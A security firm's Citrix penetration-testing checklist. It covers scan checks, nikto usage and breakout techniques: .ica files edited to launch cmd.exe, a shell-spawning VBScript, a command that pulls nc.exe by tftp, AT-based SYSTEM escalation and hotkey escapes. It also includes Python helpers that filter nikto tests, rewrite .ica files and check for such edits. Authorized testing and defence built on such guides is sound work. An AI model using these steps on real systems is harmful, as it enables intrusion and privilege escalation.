www.Cloud-Security.us

Address: P.O.Box 291, Purchase, NY 10577
Telephone: 732-763-2814
Email: service@infosecpro.com

Citrix Specific Testing:

Citrix provides remote access services to multiple users across a wide range of platforms. The following information will help you conduct a vulnerability assessment or penetration test of a Citrix implementation.

Enumeration

    Scanning

      • CGI abuses
        • NetScaler web management interface ip address cookie disclosure
      • CGI abuses : Cross Site Scripting (XSS)
        • Citrix MetaFrame XP login.asp
        • Citrix NFuse Launch Scripts
        • NetScaler web management XSS
      • Misc.
        • Citrix Published Applications Remote Enumeration
        • NetScaler web management cookie information
      • Service Detection
        • Citrix Licensing Server detection
        • Citrix Server detection
      • Web Servers
        • Citrix NFuse Server launch.asp Arbitrary Server/ Port Redirect
        • NetScaler web management cookie cipher weakness
        • NetScaler web management interface detection
        • Unencrypted NetScaler web management interface
      • Windows
        • Citrix Licensing Server License Management Console
        • Citrix Password Manager Agent Secondary Credential Information Disclosure
        • Citrix Password Manager Service Stored Credentials Disclosure
        • Citrix Presentation Server Remote Code Execution
        • Citrix Presentation Server Client Program Neighborhood Agent (PNAgent) Denial of Service
        • Citrix web interface 4.6, 5.0, 5.0.1 XSS
        • Novell Client TS/ Citrix Session Arbitrary User Profile Invocation
        • NetScaler web management cookie cipher weakness
        • NetScaler web management interface detection
        • NetScaler web management login
        • Unencrypted NetScaler web management interface
    • perl nikto.pl -host ip_address -port port_no
      • Note: all Citrix/NFuse/NetScaler tests held in the nikto database can be grepped out into a custom db_tests file that replaces the copy in the nikto\plugins directory, should you wish to limit enumeration to Citrix checks only. As of 1 Oct 09 there are 9 tests meeting these requirements.
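The filtering described in the note above, worked as an added example (a Python helper written for this page, not part of nikto, which is itself Perl). It assumes the Nikto 2.x db_tests layout: '#' comment lines plus one quoted-CSV record per test, with the URI in the 4th field and the summary in the 11th. The records in SAMPLE_DB_TESTS are constructed stand-ins with invented ids, not entries copied from the real database.

```python
import csv
import re

# The product names the note singles out.
CITRIX_KEYWORDS = ("citrix", "nfuse", "netscaler")

# Constructed stand-in for nikto's plugins/db_tests (not a copy of the real
# file). Nikto 2.x stores one quoted-CSV record per test, '#' comment lines,
# the request URI as field 4 and the human-readable summary as field 11.
# Every id, URI and summary below is invented for this example.
SAMPLE_DB_TESTS = '''# Nikto test database (constructed sample)
"900001","0","1","/cgi-bin/example.cgi","GET","200","","","","","Example CGI found.","",""
"900002","0","3","/Citrix/MetaFrame/default/login.asp","GET","200","","","","","Citrix MetaFrame XP login page found.","",""
"900003","0","3","/NFuse17/launch.asp","GET","200","","","","","Citrix NFuse launch script, check for arbitrary server/port redirect.","",""
"900004","0","1","/ws/","GET","200","","","","","NetScaler web management interface detected.","",""
"900005","0","1","/phpinfo.php","GET","phpinfo()","","","","","PHP info page found.","",""
'''

URI_FIELD = 3
SUMMARY_FIELD = 10


def filter_db_tests(db_text, keywords=CITRIX_KEYWORDS):
    """Return (filtered_text, kept_ids).

    Comment and blank lines are kept verbatim so the file header survives;
    a test record is kept only when its URI or summary mentions one of the
    keywords (case-insensitive). Quoted commas inside fields are handled by
    the csv module rather than by a naive split.
    """
    pattern = re.compile("|".join(re.escape(k) for k in keywords), re.IGNORECASE)
    kept_lines, kept_ids = [], []
    for line in db_text.splitlines():
        if not line.strip() or line.startswith("#"):
            kept_lines.append(line)
            continue
        fields = next(csv.reader([line]))
        if len(fields) <= SUMMARY_FIELD:
            continue  # malformed record: drop rather than guess its layout
        if pattern.search(fields[URI_FIELD]) or pattern.search(fields[SUMMARY_FIELD]):
            kept_lines.append(line)
            kept_ids.append(fields[0])
    return "\n".join(kept_lines) + "\n", kept_ids


def write_filtered_db(src_path, dst_path, keywords=CITRIX_KEYWORDS):
    """Read a db_tests file, write the Citrix-only subset, return kept ids."""
    with open(src_path, encoding="utf-8", errors="replace") as fh:
        text, ids = filter_db_tests(fh.read(), keywords)
    with open(dst_path, "w", encoding="utf-8") as fh:
        fh.write(text)
    return ids


if __name__ == "__main__":
    text, ids = filter_db_tests(SAMPLE_DB_TESTS)
    print(text)
    print(f"{len(ids)} Citrix-related tests kept: {ids}")
```

Run write_filtered_db against the real plugins/db_tests, back up the original first, and drop the filtered copy in its place; the count printed is for the constructed sample, not the 9 tests the note counted in the live database.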

  • Exploitation

    • Alter default .ica files
      • InitialProgram=cmd.exe
      • InitialProgram=c:\windows\system32\cmd.exe
      • InitialProgram=explorer.exe
    • Enumerate and Connect
      • For applications identified by Citrix-pa-scan
          • Requires pas.wri to be present in the same directory (obtained from the output using Citrix-pa-scan)
          • Writes output to pas_results.wri
      • For published applications with a Citrix client when the master browser is non-public.
          • pa-proxy.pl IP_to_proxy_to (i.e. remote server) 127.0.0.1
    • Manual Testing
      • Create a batch file (cmd.bat) with contents such as:
          cmd.exe
          echo off
          command
          echo on
      • Create a VBScript file that spawns a shell through WScript.Shell:
          Option Explicit
          Dim objShell
          Set objShell = CreateObject("WScript.Shell")
          objShell.Run "%comspec% /k"
          WScript.Quit
        • Alternative Run lines (chain further commands after /k):
          • objShell.Run "%comspec% /k c: & dir"
          • objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
          • objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe"
        • iKAT (Interactive Kiosk Attack Tool)
          • Reconnaissance
          • FileSystem Links
          • Common Dialogs
          • Application Handlers
          • Browser Plugins
          • iKAT Tools
      • AT command – privilege escalation
        • AT HH:MM /interactive "cmd.exe"
        • AT HH:MM /interactive %comspec% /k
        • Note: jobs scheduled with AT run as SYSTEM by default. The command itself may be available to a normal user, but the Schedule service only accepts jobs from administrators, so this escalates only if you already hold admin rights on the server; still worth a try.

      • Keyboard Shortcuts/ Hotkeys
        • Browser shortcuts (for breaking out of a published browser):
          • Ctrl + h – View History
          • Ctrl + n – New Browser
          • Shift + Left Click – New Browser
          • Ctrl + o – Internet Address (browse feature)
          • Ctrl + p – Print (to file)
          • Right Click (Shift + F10)
            • Save Image As
            • View Source
          • F1 – Jump to URL
        • ICA client default hotkeys:
          • SHIFT+F1: Local Task List
          • SHIFT+F2: Toggle Title Bar
          • SHIFT+F3: Close Remote Application
          • CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
          • CTRL+F2: Remote Task List
          • CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
          • ALT+F2: Cycle through programs
          • ALT+PLUS: Alt+TAB
          • ALT+MINUS: ALT+SHIFT+TAB
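The "Alter default .ica files" step from the Exploitation list above, worked as an added Python example (not code from the original page or from Citrix). The sample launch file is constructed; the key names Address and InitialProgram are the ones Citrix launch files use, and the rule the technique relies on is that a '#'-prefixed InitialProgram names a published application while a bare value names a program to run on the server. unpublished_initial_programs is an added defender-side check with no counterpart on the page.

```python
import configparser
import io

# Constructed sample launch file (not captured from a real deployment).
# Real .ica files carry many more keys; these are enough to show the edit.
SAMPLE_ICA = """[WFClient]
Version=2
ClientName=WI_example

[ApplicationServers]
Notepad=

[Notepad]
Address=10.0.0.5:1494
InitialProgram=#Notepad
ClientAudio=On
DesiredColor=8
"""


def _load(ica_text):
    """Parse the INI-style .ica text, preserving key case and '#' values."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep InitialProgram, not initialprogram
    cp.read_string(ica_text)
    return cp


def application_sections(cp):
    """Names listed under [ApplicationServers] that also have their own section."""
    if not cp.has_section("ApplicationServers"):
        return []
    return [app for app in cp["ApplicationServers"] if cp.has_section(app)]


def rewrite_initial_program(ica_text, program="cmd.exe"):
    """Return (new_text, changed_apps) with InitialProgram replaced in every
    application section. '#Notepad' -> 'cmd.exe' asks the server to start a
    shell instead of the published app; whether the server honours a
    client-supplied value is a farm configuration matter, so this is the
    thing to test, not a guaranteed result."""
    cp = _load(ica_text)
    changed = []
    for app in application_sections(cp):
        cp[app]["InitialProgram"] = program
        changed.append(app)
    out = io.StringIO()
    cp.write(out, space_around_delimiters=False)
    return out.getvalue(), changed


def unpublished_initial_programs(ica_text):
    """Defender-side check (added here): list (app, InitialProgram) pairs whose
    value is not a '#'-prefixed published application, i.e. a launch file that
    asks the server to run an arbitrary executable."""
    cp = _load(ica_text)
    hits = []
    for app in application_sections(cp):
        value = cp[app].get("InitialProgram", "")
        if value and not value.startswith("#"):
            hits.append((app, value))
    return hits


if __name__ == "__main__":
    altered, apps = rewrite_initial_program(SAMPLE_ICA)
    print(altered)
    print("rewrote:", apps)
    print("flagged:", unpublished_initial_programs(altered))
```

The same function applies to a launch file downloaded from Web Interface/NFuse: rewrite it, hand the result to the ICA client, and watch whether the session opens with the shell or is refused. The checker can be pointed at launch files seen on the wire or in proxy logs to spot the same edit coming from the other direction.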

    Other members of our business group:
    InfoSecPro.com | US-scada.com

    COPYRIGHT (C) 2000 - 2011 InfoSecPro.com ALL RIGHTS RESERVED